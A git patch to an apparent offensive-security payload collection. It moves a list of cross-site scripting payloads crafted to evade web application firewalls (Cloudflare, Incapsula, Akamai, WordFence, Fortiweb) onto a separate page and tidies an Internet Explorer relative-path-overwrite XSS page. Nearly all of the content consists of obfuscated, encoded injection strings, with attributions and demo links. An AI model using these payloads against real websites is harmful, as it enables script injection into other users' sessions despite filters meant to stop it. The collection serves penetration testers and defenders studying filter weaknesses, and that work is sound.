From c34a2bac15cdc31ec88c60a191aada032045f25c Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Mon, 3 Jun 2024 09:55:29 +0200
Subject: [PATCH] WAF bypass moved to a separate page

---
 XSS Injection/README.md                       | 119 +-----------------
 XSS Injection/XSS Common WAF Bypass.md        | 103 +++++++++++++++
 .../XSS with Relative Path Overwrite.md       |  38 +++---
 3 files changed, 123 insertions(+), 137 deletions(-)
 create mode 100644 XSS Injection/XSS Common WAF Bypass.md

diff --git a/XSS Injection/README.md b/XSS Injection/README.md
index 530dd9a39d..a5a487ee70 100644
--- a/XSS Injection/README.md	
+++ b/XSS Injection/README.md	
@@ -82,23 +82,6 @@
     - [Bypass CSP unsafe-inline](#bypass-csp-unsafe-inline)
     - [Bypass CSP script-src self](#bypass-csp-script-src-self)
     - [Bypass CSP script-src data](#bypass-csp-script-src-data)
-  - [Common WAF Bypass](#common-waf-bypass)
-    - [Cloudflare XSS Bypasses by @Bohdan Korzhynskyi](#cloudflare-xss-bypasses-by-bohdan-korzhynskyi)
-      - [25st January 2021](#25st-january-2021)
-      - [21st April 2020](#21st-april-2020)
-      - [22nd August 2019](#22nd-august-2019)
-      - [5th June 2019](#5th-june-2019)
-      - [3rd June 2019](#3rd-june-2019)
-    - [Cloudflare XSS Bypass - 22nd March 2019 (by @RakeshMane10)](#cloudflare-xss-bypass---22nd-march-2019-by-rakeshmane10)
-    - [Cloudflare XSS Bypass - 27th February 2018](#cloudflare-xss-bypass---27th-february-2018)
-    - [Chrome Auditor - 9th August 2018](#chrome-auditor---9th-august-2018)
-    - [Incapsula WAF Bypass by @Alra3ees- 8th March 2018](#incapsula-waf-bypass-by-alra3ees--8th-march-2018)
-    - [Incapsula WAF Bypass by @c0d3G33k - 11th September 2018](#incapsula-waf-bypass-by-c0d3g33k---11th-september-2018)
-    - [Incapsula WAF Bypass by @daveysec - 11th May 2019](#incapsula-waf-bypass-by-daveysec---11th-may-2019)
-    - [Akamai WAF Bypass by @zseano - 18th June 2018](#akamai-waf-bypass-by-zseano---18th-june-2018)
-    - [Akamai WAF Bypass by @s0md3v - 28th October 2018](#akamai-waf-bypass-by-s0md3v---28th-october-2018)
-    - [WordFence WAF Bypass by @brutelogic - 12th September 2018](#wordfence-waf-bypass-by-brutelogic---12th-september-2018)
-    - [Fortiweb WAF Bypass by @rezaduty - 9th July 2019](#fortiweb-waf-bypass-by-rezaduty---9th-july-2019)
   - [References](#references)
 
 ## Vulnerability Details
@@ -1254,111 +1237,11 @@ GET /?xss=<script>alert(1)</script>&a&a&a&a&a&a&a&a...[REPEATED &a 1000 times]&a
 Source: [@pilvar222](https://twitter.com/pilvar222/status/1784618120902005070)
 
 
-## Common WAF Bypass
-
-### Cloudflare XSS Bypasses by [@Bohdan Korzhynskyi](https://twitter.com/bohdansec)
-
-#### 25st January 2021
-
-```html
-<svg/onrandom=random onload=confirm(1)>
-<video onnull=null onmouseover=confirm(1)>
-```
-
-#### 21st April 2020
-
-```html
-<svg/OnLoad="`${prompt``}`">
-```
-
-#### 22nd August 2019
-
-```html
-<svg/onload=%26nbsp;alert`bohdan`+
-```
-
-#### 5th June 2019
-
-```html
-1'"><img/src/onerror=.1|alert``>
-```
-
-#### 3rd June 2019
-
-```html
-<svg onload=prompt%26%230000000040document.domain)>
-<svg onload=prompt%26%23x000000028;document.domain)>
-xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>
-```
-
-### Cloudflare XSS Bypass - 22nd March 2019 (by @RakeshMane10)
-
-```
-<svg/onload=&#97&#108&#101&#114&#00116&#40&#41&#x2f&#x2f
-```
-
-### Cloudflare XSS Bypass - 27th February 2018
-
-```html
-<a href="j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;&lpar;a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;(document.domain)&rpar;">X</a>
-```
-
-### Chrome Auditor - 9th August 2018
-
-```javascript
-</script><svg><script>alert(1)-%26apos%3B
-```
-
-Live example by @brutelogic - [https://brutelogic.com.br/xss.php](https://brutelogic.com.br/xss.php?c1=</script><svg><script>alert(1)-%26apos%3B)
-
-### Incapsula WAF Bypass by [@Alra3ees](https://twitter.com/Alra3ees/status/971847839931338752)- 8th March 2018
-
-```javascript
-anythinglr00</script><script>alert(document.domain)</script>uxldz
-
-anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz
-```
-
-### Incapsula WAF Bypass by [@c0d3G33k](https://twitter.com/c0d3G33k) - 11th September 2018
-
-```javascript
-<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>
-```
-
-### Incapsula WAF Bypass by [@daveysec](https://twitter.com/daveysec/status/1126999990658670593) - 11th May 2019
-
-```html
-<svg onload\r\n=$.globalEval("al"+"ert()");>
-```
-
-### Akamai WAF Bypass by [@zseano](https://twitter.com/zseano) - 18th June 2018
-
-```javascript
-?"></script><base%20c%3D=href%3Dhttps:\mysite>
-```
-
-### Akamai WAF Bypass by [@s0md3v](https://twitter.com/s0md3v/status/1056447131362324480) - 28th October 2018
-
-```html
-<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>
-```
-
-### WordFence WAF Bypass by [@brutelogic](https://twitter.com/brutelogic) - 12th September 2018
-
-```javascript
-<a href=javas&#99;ript:alert(1)>
-```
-
-### Fortiweb WAF Bypass by [@rezaduty](https://twitter.com/rezaduty) - 9th July 2019
-
-```javascript
-\u003e\u003c\u0068\u0031 onclick=alert('1')\u003e
-```
-
 ## Labs
 
 * [PortSwigger Labs for XSS](https://portswigger.net/web-security/all-labs#cross-site-scripting)
 
+
 ## References
 
 - [Unleashing-an-Ultimate-XSS-Polyglot](https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot)
diff --git a/XSS Injection/XSS Common WAF Bypass.md b/XSS Injection/XSS Common WAF Bypass.md
new file mode 100644
index 0000000000..e9d80f4b4f
--- /dev/null
+++ b/XSS Injection/XSS Common WAF Bypass.md	
@@ -0,0 +1,103 @@
+# Common WAF Bypass
+
+## Cloudflare
+
+* 25st January 2021 - [@Bohdan Korzhynskyi](https://twitter.com/bohdansec)
+    ```js
+    <svg/onrandom=random onload=confirm(1)>
+    <video onnull=null onmouseover=confirm(1)>
+    ```
+
+* 21st April 2020 - [@Bohdan Korzhynskyi](https://twitter.com/bohdansec)
+    ```js
+    <svg/OnLoad="`${prompt``}`">
+    ```
+
+* 22nd August 2019 - [@Bohdan Korzhynskyi](https://twitter.com/bohdansec)
+    ```js
+    <svg/onload=%26nbsp;alert`bohdan`+
+    ```
+
+* 5th June 2019 - [@Bohdan Korzhynskyi](https://twitter.com/bohdansec)
+    ```js
+    1'"><img/src/onerror=.1|alert``>
+    ```
+
+* 3rd June 2019 - [@Bohdan Korzhynskyi](https://twitter.com/bohdansec)
+    ```js
+    <svg onload=prompt%26%230000000040document.domain)>
+    <svg onload=prompt%26%23x000000028;document.domain)>
+    xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>
+    ```
+
+* 22nd March 2019 - @RakeshMane10
+    ```js
+    <svg/onload=&#97&#108&#101&#114&#00116&#40&#41&#x2f&#x2f
+    ```
+
+
+* 27th February 2018
+    ```html
+    <a href="j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;&lpar;a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;(document.domain)&rpar;">X</a>
+    ```
+
+## Chrome Auditor
+
+NOTE: Chrome Auditor is deprecated and removed on latest version of Chrome and Chromium Browser.
+
+* 9th August 2018
+    ```javascript
+    </script><svg><script>alert(1)-%26apos%3B
+    ```
+
+
+## Incapsula WAF
+
+* 11th May 2019 - [@daveysec](https://twitter.com/daveysec/status/1126999990658670593) - 
+    ```js
+    <svg onload\r\n=$.globalEval("al"+"ert()");>
+    ```
+
+* 8th March 2018 - [@Alra3ees](https://twitter.com/Alra3ees/status/971847839931338752)
+    ```javascript
+    anythinglr00</script><script>alert(document.domain)</script>uxldz
+    anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz
+    ```
+
+* 11th September 2018 - [@c0d3G33k](https://twitter.com/c0d3G33k)
+    ```javascript
+    <object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>
+    ```
+
+
+## Akamai WAF
+
+* 18th June 2018 - [@zseano](https://twitter.com/zseano)
+    ```javascript
+    ?"></script><base%20c%3D=href%3Dhttps:\mysite>
+    ```
+
+* 28th October 2018 - [@s0md3v](https://twitter.com/s0md3v/status/1056447131362324480)
+    ```svg
+    <dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>
+    ```
+
+
+## WordFence WAF 
+
+* 12th September 2018 - [@brutelogic](https://twitter.com/brutelogic)
+    ```html
+    <a href=javas&#99;ript:alert(1)>
+    ```
+
+## Fortiweb WAF
+
+* 9th July 2019 - [@rezaduty](https://twitter.com/rezaduty)
+    ```javascript
+    \u003e\u003c\u0068\u0031 onclick=alert('1')\u003e
+    ```
+
+
+## References
+
+* [TODO](TODO)
\ No newline at end of file
diff --git a/XSS Injection/XSS with Relative Path Overwrite.md b/XSS Injection/XSS with Relative Path Overwrite.md
index ae2e911937..851203eea4 100644
--- a/XSS Injection/XSS with Relative Path Overwrite.md	
+++ b/XSS Injection/XSS with Relative Path Overwrite.md	
@@ -1,25 +1,24 @@
-# XSS with Relative Path Overwrite - IE 8/9 and lower
+# XSS with Relative Path Overwrite
+
+:WARNING: Requires Internet Explorer 8/9 and lower.
 
 You need these 3 components
 
-```javascript
-1) stored XSS that allows CSS injection. : {}*{xss:expression(open(alert(1)))}
-2) URL Rewriting.
-3) Relative addressing to CSS style sheet : ../style.css
-```
+1. Stored XSS that allows CSS injection. : `{}*{xss:expression(open(alert(1)))}`
+2. URL Rewriting.
+3. Relative addressing to CSS style sheet : `../style.css`
 
-A little example
+Here is the HTML code of `http://url.example.com/index.php/[RELATIVE_URL_INSERTED_HERE]` 
 
 ```html
-http://url.example.com/index.php/[RELATIVE_URL_INSERTED_HERE]
 <html>
-<head>
-<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
-<link href="[RELATIVE_URL_INSERTED_HERE]/styles.css" rel="stylesheet" type="text/css" />
-</head>
-<body>
-Stored XSS with CSS injection - Hello {}*{xss:expression(open(alert(1)))}
-</body>
+    <head>
+        <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
+        <link href="[RELATIVE_URL_INSERTED_HERE]/styles.css" rel="stylesheet" type="text/css" />
+    </head>
+    <body>
+        Stored XSS with CSS injection - Hello {}*{xss:expression(open(alert(1)))}
+    </body>
 </html>
 ```
 
@@ -28,12 +27,13 @@ Explanation of the vulnerability
 > The Meta element forces IE’s document mode into IE7 compatible which is required to execute expressions. Our persistent text {}*{xss:expression(open(alert(1)))is included on the page and in a realistic scenario it would be a profile page or maybe a shared status update which is viewable by other users. We use “open” to prevent client side DoS with repeated executions of alert.
 > A simple request of “rpo.php/” makes the relative style load the page itself as a style sheet. The actual request is “/labs/xss_horror_show/chapter7/rpo.php/styles.css” the browser thinks there’s another directory but the actual request is being sent to the document and that in essence is how an RPO attack works.
 
-Demo 1 at `http://challenge.hackvertor.co.uk/xss_horror_show/chapter7/rpo.php`
-Demo 2 at `http://challenge.hackvertor.co.uk/xss_horror_show/chapter7/rpo2.php/fakedirectory/fakedirectory2/fakedirectory3`
-MultiBrowser : `http://challenge.hackvertor.co.uk/xss_horror_show/chapter7/rpo3.php`
+* Demo 1 at `http://challenge.hackvertor.co.uk/xss_horror_show/chapter7/rpo.php`
+* Demo 2 at `http://challenge.hackvertor.co.uk/xss_horror_show/chapter7/rpo2.php/fakedirectory/fakedirectory2/fakedirectory3`
+* MultiBrowser : `http://challenge.hackvertor.co.uk/xss_horror_show/chapter7/rpo3.php`
 
 From : `http://www.thespanner.co.uk/2014/03/21/rpo/`
 
+
 ## Mutated XSS for Browser IE8/IE9
 
 ```javascript
@@ -46,4 +46,4 @@ IE will read and write (decode) HTML multiple time and attackers XSS payload wil
 
 ## References
 
-- [TODO](TODO)
\ No newline at end of file
+- [RPO - Relative VS Absolute - The Spanner - Friday, 21 March 2014](http://www.thespanner.co.uk/2014/03/21/rpo/)
\ No newline at end of file